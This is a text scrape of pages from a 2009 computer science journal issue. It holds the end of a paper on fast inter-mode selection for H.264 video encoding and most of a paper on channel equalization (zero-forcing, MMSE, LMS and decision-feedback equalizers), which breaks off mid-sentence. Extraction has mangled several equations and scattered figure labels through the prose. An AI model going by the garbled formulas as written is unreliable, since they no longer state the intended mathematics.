Inter prediction uses block-based motion compensation and
it creates a prediction model from one or more previously
encoded video frames or fields used. Encoding a motion
vector for each partition can cost a significant number of
bits, especially if small partition sizes are chosen. Motion
vectors for neighboring partitions are often highly correlated
and so each motion vector is predicted from vectors of
nearby, previously coded partitions. A predicted vector,
MVp, is formed based on previously calculated motionvectors and MVD, the difference between the current vector
and the predicted vector, is encoded and transmitted. The
method of forming the prediction MVp depends on the
motion compensation partition size and on the availability of
nearby vectors. H.264 supports a range of block sizes (from
16×16 down to 4×4) and fine subsample motion vectors
(quartersample resolution) which are not supported by
earlier standards. Inter-frame selection supports the
following modes: SKIP, 16x16, 16x8, 8x16, 8x8, 8x4, 4x8
and 4x4. The mode decision is made by choosing the mode
having minimum RDO cost [2].
J(s, c, MODE|λ MODE) = SSD(s, c, MODE|QP) + λ MODE x
Where J(s, c, MODE|λ
R(s,
c, MODE|QP).
MODE) represents the mode cost, QP
denotes Quantization Parameter, λ MODE is the Lagrange
multiplier [4] for mode decision, MODE indicates a mode
chosen from the set of potential macroblock modes: {SKIP,
16 X 16, 16 X 8, 8X16, 8X8, 8X4, 4X8, 4X4, Intra_4 X 4,
16
16x16
16
8x16
8
4
16x8 8x8
8
100
0 0 1
1 2 3
16
8x8
8
4x8
4
8x4 8x8
4
100
0 0 1
1 2 3
(IJCSIS) International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
ISSN 1947 550083
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 90/215
Intra 16 X 16}, SSD represents the Sum of Squared
Differences between the original block s and its
reconstruction c.
SSD(s, c, MODE|QP) =
[x, y]-Cy[x, y, MODE|QP]) 2 [x, y]-Cu[x, y, MODE |QP]) 2
+ [x, y]-Cv[x, y, MODE |QP]) 2
where Cy[x,y,MODE|QP]) and Sy[x,y] represent the
reconstructed and original luminance values; Cu, Cv and
Su,Sv indicate the corresponding chrominance values, and
R(x,y,MODE|QP) is the number of bits associated with
choosing MODE, including the bits for the macro-block
header, the motion, and all DCT coefficients.
III THE PROPOSED IMPROVEMENT OF FAST
INTERMODE SELECTION ALGORITHM FOR H.264
The proposed algorithm, as shown in Figure 2, first
checks the skip condition and then makes the decision
between the Class 16 and Class 8 modes based on the
factors - homogeneity and temporal movement [8]. Once the
class is decided, with in the class then it uses sub-mode
selection algorithm [7] to decide the best mode among the
sub-modes.
Decision I: Compute the MB difference ∆ for the current
macro block. If ∆ is very large (∆> int er
Decision II: In this decision we first check the condition for
the SKIP mode. If the current 16x16 block has no
movement, i.e.∆ = 0 or ∆≤
) then intra mode
selection is preferred.
SKIP then SKIP mode is the
best mode.
Decision III: Once SKIP is ruled out, we make a decision
between Class 16 and Class 8 modes. Here we check the
homogeneity of the block. If the macro block is
homogeneous then Class 16 is chosen else Class 8 is chosen.
The homogeneity of the macro block is determined by the
Probability Based Macroblock Mode Selection.
Let P denote the probability of the current MB, then we
have
A cut set with is used to determine
the category which current MB belongs. Because we can get
the probability of all modes, which are computed
dynamically every frame, we let this cut set equal to the
probability of LMB. So we have
Correct Ratio is the probability of the MB classification to
predict the same optimal encoding mode obtained from
exhaustive mode selection, HMBErrRatio reflects the
probability for HMBs to be mistakenly categorized as
LMBs, while the LMBErrRatio reflects the probability for
LMBs to be mistakenly categorized as HMBs. Comparedwith the classification accurate ratio of FMMS in, our
algorithm shows the robust over all kinds of sequences with
different motion and other features.
Decision IV: A MB is determined to be an LMB when the
weighted sum is lower than , and if the is
higher than the minimum of
, the MB is determined
to be a true HMB. Otherwise, we need to further classify its
motion character. Here a motion classifier is continuing
used to determine if the MB contains complex motion
information or simple motion information. By combining
two types of classifiers, each MB can be efficientlycategorized to different mode and motion search paths,
which significantly reduces encoder complexity of H.264
for all types of content. Our fast mode decision algorithm
consists of the following steps:
Step1: If the MB is in the first row or column of a frame,
test all possible modes, select the best one, then exit.
Step2: Each MB is categorized by a probability classifier. If
the predict mode is included in the HMBs, go to Step 4.
Otherwise, go to Step 3.
Step3: Check the mode of INTER8 × 16 and INTER16 × 8.
Go to Step 9.
Step4: For B picture, calculate the RD cost of direct mode.
If it is lower than the threshold, which is defined as the
minimum of neighboring MBs, skip all other modes and go
to step 11. Otherwise, If the predict mode is included in the
TRUE HMBs, go to Step 10, otherwise go to Step 5.
Step5: To categorize the MB with a motion classifier. If it
has complex motion content, go to step 6. Otherwise, go to
Step 8.
Step6: Check mode INTER8 × 8, INTER8 × 4, INTER4 ×
8, INTER4 × 4. If there are more than two sub-macroblock
modes are not INTER8 × 8, go to step 9. Otherwise, go to
Step 7.
Step7: Check mode INTER16×16, INTER16×8 and
INTER8×16. If any mode cost is more than INTER8×8 or
the three modes have been tried, go Step 11.
Step8: Check mode INTER16×16 and INTER16×8, if
cost 16×16 < cost 16×, go to Step 9. Otherwise, check all the
other Inter modes.
Step9: Check INTRA16 × 16 and INTRA4 × 4.
(IJCSIS) International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
ISSN 1947 550084
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 91/215
Step10: Check INTER16 × 16 and INTER8 × 8.
Step11: Record the best MB mode and the minimum RD
cost.
(IJCSIS) International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
ISSN 1947 550085
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 92/215
Figure 2: Decision Diagram (If the decision is yes, move to the left branch, else move to the right branch)
Class 8
SKIP-
MODE
16x16
Δ<<ψ
Decision I
Δ<<ψ (SKIP)
Decision II
INTRA
-MODE
∑φ<<ψH (16)
Decision III
∑φ<<ψH
Decision IV
16x8 8x16
4x4
8x8 8x4 4x8
Sub-mode selection Algorithm
Sub-mode selection Algorithm
Class 16
Δ: MB difference
Ψ: Threshold
(IJCSIS) International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
ISSN 1947 550086
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 93/215
IV EXPECTED RESULTS
H.264 reference software JM8.6 [7] is applied as
platform for evaluating the performance of the improved
algorithm. We selected four representative QCIF video
sequences i.e. Container, Foreman, Salesman and Coastguard
as our test sequences.
TABLE I. SIMULATION PARAMETERS
TABLE II.SIMULATION RESULTS FOR IPPP TYPE SEQUENCES
The test conditions [12] are shown in Table1.We used four
Quantization Parameters while conducting the experiments on
the test sequences, i.e. QP = 28, QP = 32, QP = 36 and QP =
40.
The coding parameters used to evaluate the efficiency are ∆T ,
change of average PSNR – ∆PSNR and change of average datebits - ∆ Bitrate.
T ref is the coding time used by JM8.6 encoder. Let T proposed
be the time taken by the proposed algorithm.
The ∆T % is defined as
The experimental results are shown in the Table 1.
From Table 1, it is inevitable that the proposed
algorithm reduces the encoding time for the four test
sequences. Compared with the coding time of JM8.6
encoder, the coding time reduces by (88.92) % for
slow motion videos, where as, it reduces by (70.1) %
for fast motion videos. The PSNR degradation is up to (0.04 db) which is invisible to human eye and the
data bits are increased up to (0.93) %.
V CONCLUSION
In this paper we proposed a fast inter mode
selection algorithm based on the homogenous and
temporal stationary characteristics of the video object
and a procedure to select best submode. Verified by
the fast, mild and slow motion sequences, our method
could reduce the computational complexity of the
H.264/AVC encoder by choosing the best mode
judiciously. Average time reduction is about 75% in
IPPP sequence. Moreover, our algorithm can
maintain the video quality without significant bit-rate
loss. It is helpful for the real-time implementation of
the H.264 encoder and useful for the low-power
applications of video coding.
VI REFERENCES
[1]. ThomasWiegand, Gary J. Sullivan, SeniorMember, IEEE, Gisle Bjøntegaard, and Ajay
Luthra, Senior Member, IEEE. Overview of theH.264/AVC Video Coding Standard.
[2]. Yun Cheng, Kui Dai, Jianjun Guo, ZhiyingWang, Minlian Xiao. Research on Intra Modesfor Inter-Frame Coding in H.264 presented The
9th Intemational Conference on ComputerSupported Cooperative Work in Design
Proceedings.[3]. Iain E.G. Richardson. H.264 and MPEG-4 Video
Compression, Wiley2004.
[4]. Jeyun Lee and Byeungwoo Jeon. Fast ModeDecision for H.264 with Variable Motion Block Sizes. Springer - Verlag, LNCS 2869, pages 723-730, 2003.
[5]. Iain E.G. Richardson. Video Codec Design,Wiley 2002.
[6]. Zhi Zhou and Ming-Ting Sun. Fast Macroblock Inter Mode Decisionand Motion Estimation for
MV Search Range 16
GOP IPPP
Codec JM 8.6
QP 28, 32, 36, 40ProfileIDC 66, 30
Hadamard Transform Used
Entropy Coding Method CAVLC
Size QCIF
Threshold set forHomogenity
16×16: 200008×8: 5000
Video
Sequences
∆Time
(%)
∆PSNR
(dB)
∆Rate
(%)
container_qcif.yuv -86.69 -0.04 0.40
salesman_qcif.yuv -77.16 -0.03 0.91
foreman_qcif.yuv -69.50 -0.10 1.38
coastguard_qcif.yuv -62.63 -0.07 1.22
(IJCSIS) International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
ISSN 1947 550087
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 94/215
H.264/MPEG- 4 AVC. Proceedings of IEEEInternational Conference on ImageProcessing, ICIP 2004, Singapore,pages 789-792,
2004.[7]. H.264 Reference Software Version JM6.1d,
http://bs.hhi.de/ ∼ suehring/tml/, March 2003.[8]. Mehdi Jafari, Islamic Azad University, Shohreh
Kasaei, Sharif University of Technology. FastIntra- and Inter- Prediction Mode Decision inH.264 Advanced Video Coding.
[9]. D. Wu, S. Wu, K. P. Lim, F. Pan, Z. G. Li, X.
Lin. Block Inter Mode Decision for FastEncoding of H.264. Institute for InfocommResearch (I2R) Agency for Science Technologyand Research (A*STAR).
[10]. Iain Richardson and Yafan Zhao. Video EncoderComplexity Reduction by Estimation Skip ModeDistortion. Proceedings of IEEE InternationalConference on Image Processing, ICIP 2004,
Singapore, pages 103- 106, 2004.[11]. Keman Yu, Jiangbo Lv, Jiang Li and Shipeng Li.
Practical Real-TimeVideo Codec for Mobile
Devices. Proceedings of 2003 IEEEInternationalConference on Multimedia and
Expo, ICME 2003, USA, pages 509-512, 2003.[12]. Gary Sullivan, “Recommended Simulation
Common Conditions for H.26L Coding
Efficiency Experiments on Low ResolutionProgressive Scan Source Material,” VCEG-N81,14th meeting: Santa Barbara, USA. Sept. 2001.
[13]. Iain Richardson H.264 and MPEG-4 Video
Compression Video Coding for Next-generationMultimedia.
[14]. ISO/IEC 14496-10 and ITU-T Rec. H.264,Advanced Video Coding, 2003.
[15]. A. Hallapuro, M. Karczewicz and H. Malvar,
Low Complexity Transform and Quantization –
Part I: Basic Implementation, JVT documentJVT-B038, Geneva, February 2002.
[16]. Zhenyu Wei, Hongliang Li and King Ngi Ngan,
An Efficient Intra Mode Selection Algorithm ForH.264 Based On Fast Edge Classification.Proceedings of 2007 IEEE InternationalSymposium on Circuits and Systems, 2007,
ISCAS 2007, New Orleans, LA, pages 3630-3633, 2007.
AUTHOR’S PROFILE
Anupam Shukla was born on 1st January 1965, at Bhilai
(CG). He is presently working as an Associate Professor(Information Communication & Technology Deptt) at AtalBihari Vajpayee Indian Institute of Information Technology& Management,(ABVIIITM), Gwalior (MP). He completed
PhD (Electronics & Telecommunication) in the area of Artificial Neural Networks in the year 2002 and ME(Electronics & Telecommunication) Specialization inComputer Engineering in the year 1998 from Jadavpur
University, Kolkata. He stood first position in the niversityand was awarded with gold medal. He completed BE(Hons) in Electronics Engineering in 1988 from MREC,JaipurHe has teaching experience of 19 years. His research
area includes Speech recognition, Artificial neural etworks,Image Processing & Robotics. He published around 57
papers in national/international journals and conferences.
Sourabh Rungta is presently working as an Reader(Computer Science and Engineering Departtment) inRCET, Durg (CG). He completed M.Tech (Hons) in 2004.
He completed BE in 1998. He has teaching experience of 5years. He published around 5 papers in ational/internationalconferences and journals.
Neeta Tripathi is principle of RCET, Durg. She has eaching
experience of 20 years. She published around 30 papers inNational/international conferences and journals. Hercontributed research area includes speech recognition.
Kshitij Verma is presently pursuing M.E.in VLSI Designfrom SSCET,Bhilai(C.G.) He completed BE in ElectronicsAnd Telecommunication in 2005 from RCET,Bhilai(C.G.).
(IJCSIS) International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
ISSN 1947 550088
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 95/215
(IJCSIS) International Journal of Computer Science and Information Security, 2009
Vol. 4 , No. 1 & 2 , 2009
Channel Equalization in Digital Transmission
Kazi Mohammed. Saidul. Huq#1
, Miguel Bergano#1
,Atilio Gameiro#1
, Md. Taslim Arefin*2
# Institute of Telecommunications
Aveiro, Portugalkazi.saidul@av.it.pt
* Lecturer, Dept. of Computer Science and Engineering
University of Development Alternative (UODA)
Dhanmondi, Dhaka-1209, Bangladesh.2arefin.taslim@cse.uoda.edu.bd
Abstract — Channel equalization is the process of reducing
amplitude, frequency and phase distortion in a radio channel
with the intent of improving transmission performance. Differenttypes of equalizers, their applications and some practicalexample is given. Especially, in the digital communication
scenario how equalization works is shown. This paper presents avivid description on channel equalization in digital transmission
system.
Keywords— ISI, Baseband, Passband, equalization
1. INTRODUCTION
A communication system is basically a way of transmittinginformation trough a communication channel and usuallyassociated with it are the transmitter and a receiver. The main
function of it is to guarantee that information, or message,from the transmitter should be available at the receiver
without perturbations. A communication system is completedwhen joining these three parts, the transmitter, the receiver and the communication channel. Examples of communicationchannels are telephone channels, coaxial cables, optical fiber,wireless broadcast channel, mobile radio channel and satellitechannels. The signal to be transmitted could be analog or
digital. The first one implies the use of fewer hardware on thereceiver and transmitter, on the contrary digital signals needmore hardware, although digital systems are more stable,flexible and more reliable. It should be noted, however, thatwe can implement much of an analog communication system
using digital hardware and the appropriate ADC and DACsteps, and thereby secure an analog system many of theadvantages of a digital system.
Ideally a system like this would work perfectly but due toimperfections of the channel it can be defined by a morecomplete diagram, represented in Fig. 1.
Figure 1: Elements of a communication System
In a real communication system the communication channel isnot perfect, perturbations caused by imperfections on thetransmission channel or interference from outside world, for example, can generate a bad functionality of the channel.Having these issues the channel will not perform a flat
frequency response and linear phase shift mainly because of distortion. Interference and noise are contaminations thatoccur from other radio systems and from random electrical
signals produced by natural processes, respectively. In order to perform a good way of conveying information fromtransmitter to receive the problems mentioned earlier should
be considered in modeling a communication system. The maintask in this procedure is to take the channel conditions and insome way invert it, or in other words, a channel can bemathematically estimated by a transfer function, at the output,or at the receiver, it would be a system with an inverse of thattransfer function. Some problems arise in modeling thechannel; issues like nonlinearity or time variance inducedifficulties. All these mentioned issues are obstacles to
approach an ideal frequency response of the communicationsystem or to identify the channel characteristics exactly.
1.1. Digital Transmission
A digital transmission performs digital messages that are basically ordered sequence of symbols produced by a discrete
information source. Here the task is to transfer a digitalmessage from the source to the destination. In an analogcommunication system problems like the channel frequency bandwidth and the signal to noise ratio cause errors thatappear in the received message, similarly, signaling rate and
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 96/215
(IJCSIS) International Journal of Computer Science and Information Security, 2009
Vol. 4 , No. 1 & 2 , 2009
error probability play roles in digital communication namelyin the output messages.
Digital signal has usually a form of an Amplitude ModulatedPulse Train and are commonly expressed by:
x(t ) = ak p t − kD( )k
∑ (1)
where ak represents the modulated amplitude of each symbol k , D is for pulse duration or pulse to pulse interval and p(t) is theunmodulated pulse that has the values 1 or 0 periodically. In
the case of binary signaling D indicates bit duration so D=T b,and the bit rate is r b=1/T b measured in symbols per second or baud . Digital PAM signals can take several formats, basicallya simple on off with a defined duration generates a formatcalled RZ (return to zero), but others exist like NRZ ( Non
return to Zero), both polar having a DC component that
wastes power, an alternative is bipolar NRZ or split-phaseManchester or even quaternary. In a transmission process
there are several perturbations, noise contamination cross talk or spill over from other signals a phenomena described as ISI – Inter Symbol Interference – that basically is a form of distortion of signals in which symbols interfere withsubsequent symbols. Reducing the bandwidth of filter willreduce noise but would increase the ISI, for that Nyquist
stated that the symbol rate r must be lower than the twice of channel bandwidth.
r ≤ 2 B (2)
On the list of the digital transmission limitations is obviousthe channel, so to approach an ideal frequency response thechannel must be equalized. The equalizer is usually inserted
between the receiver and the channel regenerator. With this, itwill increase the knowledge of the channel characteristics thatsometimes results in some residual ISI. An equalizer is basedon the structure of a transversal filter, like it will be shownlater.
1.2. Baseband and passband digital transmission
At baseband a digital message is represented by a PAM andexpressed like equation (1). Above the modulated forms that a baseband signal can take was already mentioned, RZ,
NRZ(NRZ-L, NRZ-M, NRZ-S), Bipolar, Biphase (Biphase-L,
Biphase-M, Biphase-S), Differential Manchester:
Figure 2: Binary PAM formats
Always associated in all these formats are the noise reduction by introducing a filter, this filter should not introduce ISI, likeshowed in Fig. 3.
Figure 3: Baseband transmission system
The amplifier compensates losses in the channel and the filter LPF removes out of band contaminations, the output messageis the recovered message from the digital signal.
To transmit in longer distances passband digital transmissionis used, and requires modulation methods applied in analogsignals. Digital information has a lot of ways to be performedin a carrier wave, it can modulate amplitude, frequency or phase of a sinusoidal carrier waive.
Any modulated passband signal may be expressed in thequadrature-carrier form:
xc(t ) = Ac xi(t )cos(wct +θ ) − xq (t )sin(wct +θ )[ ] (3)
The carrier frequency f c, amplitude Ac and phase are constant.The message is contained in the phase – i – and quadrature – q – components. An amplitude modulation (ASK – Amplitude
Shift Keying) can be achieved simply using a NRZ signal,another example is QAM (Quadrature Amplitude Modulation)that achieves higher modulation speed. Phase Shits can also perform phase modulation often described as BPSK (BinaryPhase Shift Keying, if the signal has four elements in thealphabet the modulation is QPSK (Quaternary Phase Shift
Keying). An example of transmitter is in Fig. 4:
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 97/215
(IJCSIS) International Journal of Computer Science and Information Security, 2009
Vol. 4 , No. 1 & 2 , 2009
Figure 4: QPSK Transmitter
A frequency modulation (FSK – Frequency Shift Keying) isobtained when the input signal x(t) selects the frequency of anoscillator.
2. PRINCIPLES
Previously was defined several concepts of digitaltransmission systems, namely its limitations (bandwidth, noise,distortion and ISI), and formats of transmitting (modulation)for baseband and passband transmission. In order to avoid theissues related to these types of communications systems itmust properly designed.
Figure 5: Ideal model of a communication System
The signal source input has the regular input represented by (1)
this time p(t) has the form of a unit pulse δ (t). The nextsubsystem is transmission filter with low pass frequencyresponse H T (f) or impulse response hT (t). The transmittedsignal is given by:
xt t ( ) = ak δ t − kT b( )k =−∞
+∞
∑ ∗ hT (t ) = ak hT t − kT b( )k =−∞
+∞
∑ (4)
Where the asterisk represents convolution. The channelcan be considered as a filter, due to its bandwidth limitationsand imposes a frequency response function H C (f) or impulseresponse hC (t) and additive Gaussian Noise represented by n(t).At the receiver will be:
y(t ) = x(t ) + n(t ) (5)
x(t ) = x t (t ) ∗ hC (t ) (6)
x(t) is for the output of the filter. At the receiver is the filter,with frequency response H R(t) or impulse response h R(t), asampler and a comparator. So at the ouput it will be:
v(t ) = y(t ) ∗ h R (t ) = Aak pr (t − t d − KT b ) + n0(t )
k =−∞
+∞
∑ (7)
The value A is a scale factor such that pr (0)=1, n0(t) is thenoise component at the receiver filter output, and pr (t-t d ) is the
pulse shape at the receiver filter output, delayed by an amountt d due to filtering.Having all the information of the response of acommunication system it is possible to develop forms tominimize problems in the system, like ISI and SNR reduction.Zero ISI and and noise can be achieved by choosing thecorrect H T (f) and H R(f). The equations, given in [1][2],
demonstrate that is a hard task to create such frequencyresponses mainly because of the channel conditions, in a baseband transmission, or PAM, like a modem, it must have
information about the channel. For passband transmission,like cellular radio there are several obstacles to thetransmission, or for microwave links that depend on theatmosphere conditions. So the best filter to use at the receiver must be adjustable improving the performance of a
transmission. Such filter is called equalizer. There are twotypes of equalizers: preset and adjustable. The first one its parameters are determined by making measurements on thechannel and determining these parameters using thesemeasurements. The adaptive, is automatic, its parameters areadjusted by sending a known signal, called training signal.
SourceChannel
FilterEqualizer
TransmitterFilter
Figure 6: Block Diagram of PAM Communication System with
equalization
The previous figure illustrates the process of equalization. Theoverall frequency response is:
H 0( f ) = H T ( f ) H C ( f ) H E ( f ) (8)
In theory an equalizer should have an impulse response that is
the inverse of that on the channel, and the design of thissystems involves a compromise between ISI reduction andnoise reduction of the channel.
3. TYPES OF EQUALIZERS
3.1. Zero forcing
The basic idea of a Zero-Forcing Equalization – ZFE – is to
implement a filter (equalizer) that follows the channelresponse, or like already said, the channel filter. The system of
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 98/215
(IJCSIS) International Journal of Computer Science and Information Security, 2009
Vol. 4 , No. 1 & 2 , 2009
a ZFE has a frequency response indicated in (8). Asuming thatthe first Nyquist critereon is satisfied by the sampler a ZFE islike a inverse filter, the inverse frequency response of the
chanell frequency response and is usually approximated by aset of FIR filters like is presented in Fig. 7.
To formulate a set of FIR inverse filter coefficients, a trainingsignal consisting of an impulse is transmitted over the channel.By solving a set of simultaneous equations based on the
received sample values, a set of coefficients can bedetermined to force all but the center tap of the filtered
response to 0. This means the N–1 samples surrounding thecenter tap will not contribute ISI. The main advantage of thistechnique is that the solution to the set of equations is reducedto a simple matrix inversion.
The major drawback of ZFE is that the channel response may
often exhibit attenuation at high frequencies around one-half
the sampling rate (the folding frequency). Since the ZFE issimply an inverse filter, it applies high gain to these upper frequencies, which tends to exaggerate noise. A second problem is that the training signal, an impulse, is inherently alow-energy signal, which results in a much lower received
signal-to-noise ratio than could be provided by other trainingsignal types [3][6].
Figure 7: Filter Structure of a ZFE
3.2. Minimum Mean Square
Since ZFE ignore the additive noise and may significantlyamplify noise for channels with spectral nulls another type of
equalizer my be used to partially avoid this problem. TheMinimum-mean-square error (MMSE) equalizers minimizethe mean-square error between the output of the equalizer and
the transmitted symbol. They require knowledge of some autoand cross-correlation functions, which in practice can beestimated by transmitting a known signal over the channel. Insuch an equalizer the Coefficients in Fig. 7 are chose tominimize the mean square error (MMSE). The error consistson the sum of the squares of ISI terms plus noise.
The MMSE at the equalizer is the expected value of thesquare of the error.
MMSE = E (error )2[ ] (9)
Analitically the error represents the difference between thedesired value and the real value.
MMSE = E z(t ) − d (t )[ ]2
{ } (10)
Following this concept of obtaining the minimum error, thetask is to determine the taps of the filter in Fig. 7 in order to perform a transmission with minimum errors. In Fig. 8 is
presented a scheme points out the interesting signals used inthe process[10].
Channel andReceiver
FiltersDecision∑
TransverseFilter
Equalizer
TransverseFilter
Equalizer
∑Noise
y(t)z(t)
d’(t)
Figure 8: MMSE Equalizer Circuit
3.3. Adaptive equalizers
Most of the times the channel, besides being unknown, it isalso changing with time, a solution can be achieved by
creating an algorithm that adjust the taps of the filter byfollowing the channel and lead to the optimum values of theequalizer. Adaptive equalization has different ways to performautomatic algorithms.
3.3.1 Decision Directed Equalization
The previous equalizer systems are linear in that they employlinear transversal filter structures. The filters implement aconvolution sum of a computed impulse response with theinput sequence. Often with data communication systems, onecan take advantage of prior knowledge of the transmit signal
characteristics to deduce a more accurate representation of the
transmit signal than can be afforded by the linear filter. It is possible to devise a decision device (a predictor or a slicer)that estimates what symbol value was most likely transmitted, based on the linear filter continuous output. The difference between the decision device input and output forms an error
term which can then be minimized to adapt the filter coefficients. This is true because a perfectly adapted filter would produce the actual transmitted symbol values, and,therefore, the slicer error term would go to 0. In practice, theerror is never 0, but if the adapted filter is near ideal, the
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 99/215
(IJCSIS) International Journal of Computer Science and Information Security, 2009
Vol. 4 , No. 1 & 2 , 2009
decisions are perfect. In this case, the slicer is effectivelythrowing away received noise with each decision made.
3.3.2 Decision-Feedback Equalization
Another nonlinear adaptive equalizer should be considered:the decision feedback equalization (DFE). DFE is based onthe principle that once we have determined the value of thecurrent transmitted symbol, we can exactly remove the ISI
contribution of that symbol to future received symbols (seeFigure 5). The nonlinear feature is again due to the decision
device, which attempts to determine which symbol of a set of discrete levels was actually transmitted. Once the currentsymbol has been decided, the filter structure can calculate theISI effect it would tend to have on subsequent receivedsymbols and compensate the input to the decision device for the next samples. This postcursor ISI removal is accomplished
by the use of a feedback filter structure.
4. DESIGN IN BASEBAND
In baseband the frequency bandwidth of transmission is equalto the symbol rate. In this case the samples are real numbers
while passband the samples are complex numbers. A firstconsequence of baseband equalization is the delayintroduced by the equalizer in the carrier recovery loop. Thisdelay affects the loop stability, steady-state jitter performance as well as its acquisition behavior. An exampleof a Least Mean Square Algorithm is presented next.
4.1. Program in Matlab
The least mean squared (LMS) equalizer is a more generalapproach to automatic synthesis. The coefficients aregradually adjusted to converge to a filter that minimizes the
error between the equalized signal and the stored reference.The filter convergence is based on approximations to a
gradient calculation of the quadratic equation representing themean square error. The only parameter to be adjusted is theadaptation step size αa. Through an iterative process, all filter tap weights are adjusted during each sample period in the
training sequence. Eventually, the filter will reach aconfiguration that minimizes the mean square error between
the equalized signal and the stored reference. As might beexpected, the choice of αa involves a tradeoff between rapidconvergence and residual steady-state error. A too-largesetting for αa can result in a system that converges rapidly onstart-up, but then chops around the optimal coefficient settingsat steady state.
In this algorithm the input signal considered was noise, andthe channel filter parameters were previously determined in a
practical experience. Noise (White Noise) was added to theoutput of the channel. Then it takes N samples for trainingsequence (for the plots N=60) and finally the weights of the
channel filter are calculated. It verifies a good estimation of the channel filter parameters as demonstrated by the error curve, that present values of 10
-1. Also it verifies very
approximate values of the weights.
Figure 9: Real and Estimated Output Signals
Figure 10: Error
Figure 11: Estimated and Calculated Weights of Channel Filter
A MMSE algorithm was also tested and presented a clear way
of the implementation of this type of equalizer. The plotsshow the equalizer results for 1000 samples and using 500 for training. The input is a QAM signal.
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 100/215
(IJCSIS) International Journal of Computer Science and Information Security, 2009
Vol. 4 , No. 1 & 2 , 2009
Figure 12: Input Signal
Figure 13: Received Samples
Figure 14: Equalized Symbols
It performs a good estimation of the weights of thetransversal filter, and provides the optimum values for thefilter.
5. BASEBAND VS PASSBAND EQUALIZATION
5.1. Examples
Next is an example of a Baseband and PassBand Equalization
in the context of QAM (or multiphase PSK).[8]In a practical implementation, an equalizer can be realized
either at baseband or at passband. For example Fig. 15illustrates the demodulation the demodulation of QAM (or multiphase PSK) by first translating the signal to basebandand equalizing the baseband signal with an equalizer having
complex-valued coefficients.
nˆRe I⎡ ⎤
⎣ ⎦
nˆIm I⎡ ⎤
⎣ ⎦
[ ]nRe ε
[ ]nIm ε
ic os tω
is in tω
Figure 15: QAM (Multiphase QPSK) signal demodulation
In effect, the complex equalizer with complex-valued (in- phase and quadrature components) inputs is equivalent to four parallel equalizers with real-valued tap coefficients as shownin Fig. 16.
nˆRe I⎡ ⎤
⎣ ⎦
nˆIm I⎡ ⎤
⎣ ⎦
[ ]nRe(c )
[ ]nIm(c )
[ ]nIm(c )
[ ]nRe(c )
Figure 16: Complex-valued baseband equalizer for QAM (Multiphase
QPSK) signals
On the other hand, we may equalize the signal at passband.This is accomplished as shown in Fig. 17 for a two-dimensional signal constellation such as QAM and PSK. The
received signal is filtered and, in parallel, it is passed througha Hilbert transformer, called a phase-splitting filter.
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 101/215
(IJCSIS) International Journal of Computer Science and Information Security, 2009
Vol. 4 , No. 1 & 2 , 2009
j te ω −
j te ω
Figure 17 – QAM or QPSK signal equalization at passband signals
Thus, we have the equivalent of in-phase and quadraturecomponents at passband, which are fed to a passband complexequalizer. Following the equalization, the signal is down-converted to a baseband and detected. The error sigbalgenerated for the purpose of adjusting the equalizer co-
efficients is formed at baseband and frequency-translated to
passband as illustrated in Fig. 17.
6. APPLICATIONS (EXAMPLES)
6.1. Equalization in Modem (ADSL) Applications
Today, automatic equalization is used on just about allmodems designed for operation over the switched telephonenetwork. With automatic equalization, a certain initializationtime is required to adapt the modem to existing line conditions.
This initialization time becomes important during and after line outages, since line initial equalization times can extendotherwise short dropouts unnecessarily. Recent modem
developments shortened the initial equalization time to between 15 and 25 ms, whereas only a few years ago a muchlonger time was commonly required. After the initialequalization, the modem continuously monitors andcompensates for changing line conditions by an adaptive
process. This process allows the equalizer to ‘track’ thefrequently occurring line variations that occur during datatransmission without interrupting the traffic flow. On one9600 bps modem, this adaptive process occurs 2400 times asecond, permitting the recognition of variations as theyoccur [9].
6.2. Equalization for Digital Cellular Telephony
The direct sequence spreading employed by CDMA (IS-95)obviates the need for a traditional equalizer. The TDMAsystems (for example, GSM and IS-54), on the other hand,
make great use of equalization to contend with the effects of multipath-induced fading, ISI due to channel spreading,additive received noise, and channel-induced spectraldistortion, etc. Because the RF channel often exhibits spectralnulls, the linear equalizers are not optimal due to their tendency to boost noise at the null frequencies. Of thenonlinear equalizers, the DFE is currently the most practical
system to implement in a consumer system. As discussed below, there are other designs that outperform the DFE interms of convergence or noise performance, but thesegenerally come at the expense of greatly increased system
complexity. Today, most TDMA phones employ DFE running
on fixed-point DSPs such as those in the TMS320C5x [4] family.
6.3. Equalization used in GSM
An adaptive equalizer is used in the demodulator of thereceiver to compensate for its difficulty in recognizing theoriginal bit pattern from the distorted signal. Distortion of thesignal is caused by the fact that the Doppler shift and the delaytime for each path varies continuously. As a result, the
channel characteristic (the impulse response) changes over time. The equalizer used for GSM is specified to equalizeechos up to 16 ms after the first signal received. This
corresponds to 4.8 km in distance. One bit period is 3.69 ms.Hence, echos with about 4 bit lengths delay can becompensated [5].
6.4. Equalization in HSPA and 3GPP
Receiver-side equalization [6] has for many years been usedto counteract signal corruption due to radio-channel frequency
selectivity. Equalization has been shown to providesatisfactory performance with reasonable complexity at least
